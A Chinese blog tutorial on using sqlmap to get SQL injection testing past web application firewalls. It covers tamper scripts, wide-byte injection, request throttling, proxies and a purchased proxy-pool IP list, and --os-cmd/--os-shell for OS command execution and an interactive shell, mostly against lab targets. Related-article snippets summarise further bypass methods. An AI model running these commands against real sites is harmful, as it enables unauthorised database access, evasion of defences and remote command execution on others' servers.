SQLMAP使用教程(四)实战技巧三之绕过防火墙

已于 2022-07-21 21:52:07 修改
阅读量774 收藏 4
点赞数 2
分类专栏: 安全工具 文章标签: php mysql 数据库 web安全
于 2022-07-06 23:19:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51730169/article/details/125630481
版权 
目前很多网站都使用waf对网站进行保护,在渗透测试过程中,很多的操作都会被拦截,在测试SQL注入时,waf会对请求过来的流量进行拦截,
导致SQLMAP请求的内容无法到达目标,SQLMAP无法判断目标是否存在注入,waf对恶意的攻击请求进行拦截,拦截会拉入黑名单,导致攻击者
访问不到目标。无法进行安全检测。

一、查看temper模块

sqlmap --list-tamper

在这里插入图片描述

二、宽字节注入

sqlmap -u "http://192.168.127.131/sql/Less-32/?id=1" --dbms mysql --tamper "unmagicquotes.py" -v 4 --current-user

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

三、设置线程大小

在遇到waf的时候,如果并发过大,会认为是cc攻击,ip会被封堵。

--threads=1 设置线程为1

四、设置http请求延时

--delay=DELAY 设置每个 HTTP请求的延迟秒数。

五、使用代理注入

sqlmap -u "http://192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name --dbms mysql -v 1  --proxy=http://192.168.1.107:4455

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

六、使用代理池注入

购买代理池之后,获取代理保存到文件内,比如:proxy.txt

123.73.208.166:46603
123.73.63.29:46603
123.73.63.84:46603
112.123.40.42:40806
183.47.94.248:38090
121.237.149.88:13804
114.99.108.71:23359
123.73.209.246:46603
123.73.63.132:46603
119.55.253.202:39730

--proxy-file 从文件中加载代理列表。
sqlmap -u "http://192.168.0.136:7766/Less-32/?id=1" --dbms mysql --tamper "unmagicquotes.py" -v 1 --proxy-file=proxy.txt

七、sqlmap命令执行

--os-cmd=OSCMD      执行操作系统命令
--os-shell          调出交互式操作系统 shell

注入点的当前用户是dba时,使用以上两个命令,一个是执行命令,一个是调用交互操作系统shell

1、sqlmap -u "http://www.dm1.com/inj.aspx?id=1" -v 1 --os-cmd="net user"

2、sqlmap -u "http://www.dm1.com/inj.aspx?id=1" -v 1 --os-shell
使用--os-shell命令会弹出一个交互shell的界面,可以输入命令,如果可以回显就会返回命令执行的信息。
Aτθ
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap绕过防火墙
weixin_42917890的博客
04-06 1217
0x00 前言    现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文基于sqlmap 进行绕过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环...
SQLMAP使用笔记.pdf
01-25
SQLMAP使用笔记
使用sqlmap绕过过滤
08-05
该文档讲解了如何使用sqlmap绕过过滤手段的方法,有兴趣的可以下载看看
黑客10种绕过防火墙方法
最新发布
03-20 2181
SSL/TLS隧道:SSL(Secure Sockets Layer)/TLS(Transport Layer Security)隧道是通过SSL/TLS协议建立的安全通信隧道,用于在客户端和服务器之间建立加密的通信连接。在分段攻击中,攻击者通过发送特制的网络数据包,利用目标系统对数据包的处理逻辑漏洞,实现对目标系统的攻击。中间人攻击:攻击者将自己的IP地址伪装成受害者或者目标服务器的IP地址,从而使得通信的两端都误以为与对方直接通信,而实际上数据包都经过了攻击者的中间节点,攻击者窃取或篡改通信内容。
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
渗透测试必备神器SQLMAP的所有绕waf脚本合集
10-18
这个脚本合集给出了各种数据库对应的绕waf脚本名称,方便针对各种过滤手段选择对应的脚本 在许多情况下,防火墙只能防御已知的攻击模式和威胁。然而,SQL注入是一种动态的、高度灵活的攻击方式,防火墙很难对其进行全面的防御。SQLMAP利用这一点,通过构造特定的SQL语句,绕过防火墙的检测,直达数据库。 具体来说,SQLMAP首先会尝试猜测应用程序所使用的数据库类型(如MySQL、Oracle等),然后根据该数据库类型的语法和特性,构造出特定的SQL语句。这些语句在防火墙看来可能是正常的、合法的请求,但实际上却包含了恶意的SQL代码,能够导致数据库泄漏数据、甚至完全被控制。 当然,SQLMAP并不是一种万能的工具。它需要使用者具备一定的技术知识和经验,才能正确地使用并获得最佳效果。尽管如此,SQLMAP无疑是一个强大的工具,它可以帮助你发现那些防火墙可能无法检测到的安全风险。 总结起来,SQLMAP是一种强大的、能够绕过防火墙检测的工具。它能够帮助你发现并利用应用程序中的SQL注入漏洞,及时修复这些漏洞,确保你的数据安全。所以,如果你想确保你的应用程序免受潜在威胁的影响,那么SQLMA
实战绕过双重waf(玄武盾+程序自身过滤)结合编写sqlmap的tamper获取数据.pdf
03-24
实战绕过双重waf 玄武盾+程序自身过滤 结合编写sqlmap的tamper获取数据 文档来自互联网仅做学习使用,请勿使用文档相关内容进行违法犯罪活动。
使用sqlmap 绕过防火墙进行注入测试
热门推荐
煜铭2011
04-20 4万+
0x00 前言 现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行绕过,达到注入的目标。因为现在WAF/IPS/IDS都把sqlmap 列入黑名单了,呵呵!但是本文基于sqlmap 进行绕过注入测试,介绍至今仍然实用有效的技巧,以下策略在特定的环境能够成功绕...
SQLmap简介以及防火墙绕过方法
weixin_30526593的博客
01-23 473
简介 许多现实中对于网站的攻击往往是由于网站没有及时更新或者对于用户的输入没有进行检查。从缓冲区溢出说起,这样一种针对系统脆弱性的威胁,最根本的问题还是在于对于用户的输入没有进行检查。作为主要威胁之一的SQL注入带来了人们对于其应用和数据库的担忧。这个问题的出现有十年的时间了,但是现在仍旧在许多网站中出现。SQL注入就像许多当前主要的的web应用安全攻击问题也被划归在了对于用户输...
sqlmap的使用详解(绕过防火墙
→_→
10-11 2077
目录 0x01 确认WAF 0x02 使用参数进行绕过 0x03 使用脚本介绍 1 使用格式: 2 脚本总类 0x04脚本参数组合策略绕过 1 mysql绕过: 2 MSSQL: 3 ms access: 4Oracle: 5 建议: 0x01 确认WAF 首先我们判断该Web 服务器是否被WAF/IPS/IDS保护着。这点很容易实现,因为我们在漏扫或者使用专门工具来检测是否有WAF,这个检测,在nmap 的NSE,或者WVS的策略或者APPSCAN的策略中都有,我...
php网站绕过防火墙,SQLmap绕过防火墙
weixin_28702147的博客
03-11 280
确认WAFsqlmap命令:sqlmap -u 目标URL --threads=10 --identify-waf#首选sqlmap -u 目标URL --threads=10 --check-waf#备选使用burpsuite抓包 --> 右击send to intruder --> 把id=x,x设为变量(选中x 点击右边add) --> payload --> loa...
sqlmap绕过过滤的 tamper 脚本分类汇总
03-17
sqlmap绕过过滤的 tamper 脚本分类汇总 sqlmap
SQLmap————9、使用参数绕防火墙
Fly_鹏程万里
05-05 654
检测web服务是否受到防火墙保护首选sqlmap -u http://yiliao.kingdee.com/contents.php?id=51&types=4--thread 10   --identify-waf备选sqlmap -uhttp://yiliao.kingdee.com/contents.php?id=51&types=4 –thread 10    --chec...
网络安全-sqlmap注意项及高级使用
关注网络安全、云原生安全
07-12 2030
注意项 ip隐藏 跑一些python脚本获取免费ip代理,或者购买稳定的ip代理 --proxy=http://112.84.54.169:9999 UserAgent隐藏 参数:-A="你的UserAgent" 或者--random-agent 高级使用
sqlmap tamper mysql_SQLmap使用tamper绕过WAF防火墙过滤
weixin_30291543的博客
01-30 267
如何判断使用哪个脚本最简单的办法就是在url参数中手工带入关键词,判断是否被过滤。如图:直接加个单引号被过滤,说明注入时单引号是没法用的。空格、等于号都没有过滤,成功报错。select被过滤。以此类推,当sqlmap注入出现问题时,比如不出数据,就要检查对应的关键词是否被过滤。比如空格被过滤可以使用space2comment.py,过滤系统对大小写敏感可以使用randomcase.py等等。下面对...
如何使用SQLMap绕过WAF
0ffs3t
05-14 1487
摘要:Author:bugcx or Anonymous WAF(web应用防火墙)逐渐成为安全解决方案的标配之一。正因为有了它,许多公司甚至已经不在意web应用的漏洞。遗憾的是,并不是所有的waf都是不可绕过的!本文将向大家讲述,如何使用注入神器SQLMap绕过WAFs/IDSs。 svn下载最新版... Author:bugcx or Anonymous WAF(web应用防火墙
绕过防火墙限制的两种方法
≡≡奋斗中的猫≡≡
09-12 3万+
您是否碰到过这种情况,您所在的公司或学校的主机装有防火墙,由于这些防火墙的限制,使你不能随意去看某些网页或访问某些服务器,如果你回到“是”,那么就恭喜你了,因为我有办法绕过这些防火墙。   方法一:用网页转向功能   有些网站提供网页转向功能,那个提供这个功能的服务器就好像是代理一样差不多,这种方法过滤防火墙的原理如下:   假设一个防火墙不允许用户去看http://www.bux

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值